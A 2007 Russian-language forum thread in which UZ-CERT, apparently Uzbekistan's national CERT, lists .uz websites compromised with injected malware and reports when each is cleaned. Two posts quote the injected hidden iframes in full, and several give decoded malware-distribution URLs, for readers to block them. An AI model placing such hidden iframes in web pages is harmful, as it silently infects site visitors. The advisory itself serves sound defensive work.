|
|
Знаете ли Вы, что ... | |
...для каждой темы существует свой раздел. Изучите структуру форума. Если соответствующего раздела нет, то всегда есть раздел "Разное" :) | |
<< Предыдущий совет - Случайный совет - Следующий совет >> |
UZ-CERT Отдел информационной безопасности ЕИ UZINFOCOM (cert.uz) |
Закрыто |
|
Опции темы | Опции просмотра |
19.09.2007 15:08 | #1 | ||
Сообщений: 4,884
+ 433
2,393/1,396
– 12
37/21
|
Уважаемые пользователи!
В связи с участившимися случаями внедрения вредоносного кода на веб-сайты доменной зоны .UZ решено открыть данный тред, в котором мы будем публиковать названия зараженных сайтов, которые могут предоставлять угрозу и инфицировать пользовательские рабочие станции вирусами и троянами. По устранению угрозы на сайте мы будем давать анонс о безопасности ресурса. Если вы самостоятельно обнаружите какой-либо инфицированный сайт, то просим вас сообщить нам об этом по этой ссылке. Последний раз редактировалось Eldar Ishimbaev; 19.09.2007 в 15:11. |
||
|
19.09.2007 15:29 | #2 |
Сообщений: 967
+ 184
236/143
– 1
1/1
|
На веб-сайте hттp://www.me.uz были обнаружены сразу две ссылки, загружающие вредоносное ПО на компьютер пользователя.
Первая вредоносная ссылка: [HTML]<html><iframe src=http://oya.ru/vyhod/numizmat/ima/ frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe></html>[/HTML] Вторая вредоносная ссылка: [HTML]<iframe src="http://zlo-x.net/XDS/iframe.php" width=0 height=0 border=0></iframe>[/HTML] Просим с осторожностью заходить на указанный веб-сайт до решения проблемы и заблокировать вредоносные ссылки в своих межсетевых экранах. update: Сайт излечен. Вредоносный код убран. Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:28. |
|
20.09.2007 14:33 | #3 | ||
Сообщений: 967
+ 184
236/143
– 1
1/1
|
На веб-сайте hттp://www.arksugurta.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]--> После расшифровки кода (а зашифрован он аж 4 раза) получаем следующую ссылку: hттp://dodo32.org/505/Xp/ Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку. update: Сайт излечен. Вредоносный код убран. Последний раз редактировалось Dmitry Paleev; 24.09.2007 в 10:59. |
||
|
"+" от:
|
20.09.2007 14:42 | #4 | ||
Сообщений: 967
+ 184
236/143
– 1
1/1
|
На веб-сайте hттp://www.elgroup.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]--> Внедрен он в 7 местах в файле index. После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/ Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку. update: Сайт излечен. Вредоносный код убран. Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:25. |
||
|
20.09.2007 14:46 | #5 | ||
Сообщений: 967
+ 184
236/143
– 1
1/1
|
На веб-сайте hттp://www.innovation.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]--> Внедрен он в 2 местах в файле index. После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/ Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку. update: Сайт излечен. Вредоносный код убран. Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:25. |
||
|
20.09.2007 14:50 | #6 | ||
Сообщений: 967
+ 184
236/143
– 1
1/1
|
На веб-сайте hттp://www.iptv.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]--> Внедрен он в одном месте файла index. После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/ Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку. update: Сайт излечен. Вредоносный код убран. Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:26. |
||
|
20.09.2007 15:38 | #7 | ||
Сообщений: 967
+ 184
236/143
– 1
1/1
|
На веб-сайте hттp://roller.sarkor.uz были обнаружены 2 вредоносные ссылки.
Первая ссылка: Код:
<iframe src="http://lilohost.hk/cgi/index.php" width="0" height="0"></iframe> Код:
<iframe name=857699b070 src='http://alltraff.ru/lol.php?1003893b72477f' width=761 height=186 style='display: none'></iframe> Последний раз редактировалось Dmitry Paleev; 20.09.2007 в 17:07. |
||
|
Реклама и уведомления | |
20.09.2007 15:50 | #8 | ||
Сообщений: 967
+ 184
236/143
– 1
1/1
|
На веб-сайте hттp://www.versal.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]--> Внедрен он в 3 местах в файле index. После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/ Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку. update: Сайт излечен. Вредоносный код убран. Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:26. |
||
|
20.09.2007 15:55 | #9 | ||
Сообщений: 967
+ 184
236/143
– 1
1/1
|
На веб-сайте hттp://www.asus.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]--> Внедрен он в 1 месте в файле index. После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/ Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку. update: Сайт излечен. Вредоносный код убран. Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:27. |
||
|
20.09.2007 15:59 | #10 | ||
Сообщений: 967
+ 184
236/143
– 1
1/1
|
На веб-сайте hттp://www.glob.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]--> Внедрен он в 9 местах в файле index. После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/ Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку. update: Сайт излечен. Вредоносный код убран. Последний раз редактировалось Dmitry Paleev; 21.09.2007 в 11:27. |
||
|
|